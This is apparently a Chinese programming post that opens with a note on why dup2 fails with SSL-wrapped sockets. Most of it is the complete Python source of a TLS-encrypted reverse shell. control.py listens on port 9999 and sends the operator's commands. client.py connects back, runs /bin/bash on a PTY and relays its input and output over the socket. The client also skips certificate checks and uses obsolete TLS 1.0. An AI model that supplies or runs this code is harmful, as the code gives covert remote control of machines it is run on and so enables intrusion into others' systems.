对于普通socket,可以使用dup2,因为通过fileno()获得的文件描述符是内核层面的表示形式。如果使用ssl.wrap_socket,得到的sock只是SSL在用户空间的包装,无法直接利用dup2,需要使用管道把stdin/stdout映射到sock。

python ssl sock 使用select的注意事项(stackoverflow): https://stackoverflow.com/questions/3187565/select-and-ssl-in-python

#control.py:

import socket
import ssl
import threading
import os

def create_ssl_socket():
    """Create the controller's TLS-wrapped socket.

    Loads the certificate/key pair from ``./server.crt`` and ``./server.key``
    and wraps a freshly created TCP socket with it.

    Returns:
        The wrapped ``ssl.SSLSocket`` on success, or ``False`` when the socket
        could not be created or the certificate could not be loaded (the
        error is printed before returning).
    """
    s = None
    try:
        s = socket.socket()
        # ssl.wrap_socket() was removed in Python 3.12. Building the context
        # explicitly keeps the same protocol and certificate settings.
        # NOTE(review): TLS 1.0 is obsolete, but the peer script pins the same
        # version, so both ends have to be upgraded together.
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.load_cert_chain(certfile='./server.crt', keyfile='./server.key')
        ssl_socket = context.wrap_socket(s)
    except Exception as e:
        print(e)
        # Do not leak the raw socket when wrapping fails.
        if s is not None:
            s.close()
        return False

    return ssl_socket

def bind_socket(ssl_socket,laddr,lport):
    """Bind the socket to (laddr, lport), start listening, and report the port.

    Args:
        ssl_socket: socket object to bind; must provide bind() and listen().
        laddr: local address to bind to.
        lport: local port number to bind to.
    """
    endpoint = (laddr, lport)
    backlog = 10
    ssl_socket.bind(endpoint)
    ssl_socket.listen(backlog)
    banner = "[*]SSL socket bind port: %d " % lport
    print(banner)

def client_accept(ssl_socket):
    """Accept one client, then run the receive thread and the command prompt.

    Blocks until a client connects. Output from the client is printed by
    client_loop() on a background thread, while client_shell() runs in the
    calling thread and sends the operator's commands.

    Args:
        ssl_socket: listening socket to accept the connection on.
    """
    print("[*]Waiting for client... ")
    connection, peer = ssl_socket.accept()
    print("[+]Client has been connected , %s " % str(peer))

    # Receiving runs in the background so the prompt below stays responsive.
    receiver = threading.Thread(target=client_loop, args=(connection,))
    receiver.start()

    client_shell(connection)

def client_loop(agent):
    """Print everything received from the client until the connection ends.

    Reads chunks of up to 2048 bytes from ``agent`` and prints them as text.
    The loop stops when the peer closes the connection (empty read) or when
    receiving fails; in both cases a debug line is printed and the socket is
    closed.

    Args:
        agent: connected socket-like object providing recv() and close().
    """
    import codecs

    # A chunk boundary can fall in the middle of a multi-byte UTF-8 character.
    # The incremental decoder buffers the partial bytes until the rest
    # arrives, and errors="replace" keeps invalid bytes from raising.
    decoder = codecs.getincrementaldecoder("utf-8")(errors="replace")
    try:
        while True:
            try:
                data = agent.recv(2048)
            except Exception:
                # Any receive failure ends the session.
                break
            if not data:
                # Empty read: the peer closed the connection.
                break
            text = decoder.decode(data)
            if text:
                print(text)
    finally:
        print("[DEBUG] Exit client recv")
        agent.close()

def client_shell(client):
    """Prompt the operator for commands and send each one to the client.

    Every entered line is sent UTF-8 encoded with a trailing newline. The
    loop ends when standard input reaches end-of-file or when sending fails
    (the send error is printed).

    Args:
        client: connected socket-like object providing sendall().
    """
    while True:
        try:
            command = input("> ")
        except EOFError:
            # Standard input was closed: stop prompting instead of crashing.
            break
        # Append a real newline so the receiving side gets a complete line;
        # the previous "\\n" literal sent a backslash followed by "n".
        command = command + "\n"
        try:
            # sendall() keeps writing until the whole command has been sent.
            client.sendall(command.encode("utf-8"))
        except Exception as e:
            print(e)
            break

if __name__ == "__main__":
    # Controller entry point: create the TLS socket, listen on port 9999 on
    # all interfaces, then serve a single client.
    s = create_ssl_socket()
    if s is False:
        # create_ssl_socket() has already printed the error. Exit with a
        # non-zero status so callers can tell that start-up failed.
        raise SystemExit(1)

    bind_socket(s,'',9999)
    client_accept(s)
###client.py:

import os
import ssl
import socket
import subprocess
import pty
import select

def create_ssl_socket():
    """Create the client's TLS-wrapped socket (not yet connected).

    Returns:
        The wrapped ``ssl.SSLSocket`` on success, or ``False`` when the socket
        or TLS context could not be created (the error is printed before
        returning).
    """
    s = None
    try:
        s = socket.socket()
        # ssl.wrap_socket() was removed in Python 3.12. Building the context
        # explicitly keeps the same protocol selection.
        # NOTE(review): no certificate verification is configured here and
        # TLS 1.0 is obsolete. The controller script pins the same version,
        # so both ends have to be upgraded together.
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ssls = context.wrap_socket(s)
    except Exception as e:
        print(e)
        # Do not leak the raw socket when wrapping fails.
        if s is not None:
            s.close()
        return False
    return ssls

if __name__ == "__main__":
    # Client entry point: connect to the controller, start bash on a PTY and
    # relay bytes between the TLS socket and the PTY until either side ends.
    s = create_ssl_socket()
    if s is False:
        # create_ssl_socket() has already printed the error.
        raise SystemExit(1)
    s.connect(("ip addr", 9999))
    # Spawn a PTY
    master, slave = pty.openpty()
    # Run bash inside it
    bash = subprocess.Popen(["/bin/bash"],
                            preexec_fn=os.setsid,
                            stdin=slave,
                            stdout=slave,
                            stderr=slave,
                            universal_newlines=True)
    # The child has its own copies of the slave end; the parent only needs
    # the master side, so release the parent's slave descriptor.
    os.close(slave)
    try:
        while bash.poll() is None:  # While bash is alive
            # Wait for data on either the socket or the PTY
            readable, _, _ = select.select([s, master], [], [])
            if s in readable:  # Reading data from the SSL socket
                try:
                    data = s.recv(1024)
                except ssl.SSLError as err:
                    if err.errno == ssl.SSL_ERROR_WANT_READ:
                        continue
                    raise
                if not data:  # End of file.
                    break
                # select() only sees the underlying descriptor. Bytes that
                # the SSL layer has already decrypted and buffered must be
                # drained here, or they would wait for the next network read.
                data_left = s.pending()
                while data_left:
                    data += s.recv(data_left)
                    data_left = s.pending()
                os.write(master, data)
            # A separate "if" (not "elif") so PTY output is forwarded in the
            # same pass when both descriptors are ready.
            if master in readable:  # Reading data from the PTY.
                try:
                    output = os.read(master, 2048)
                except OSError:
                    # Reading the master fails once the shell side is gone.
                    break
                if not output:
                    break
                # sendall() keeps writing until the whole chunk is sent.
                s.sendall(output)
    finally:
        s.close()
        os.close(master)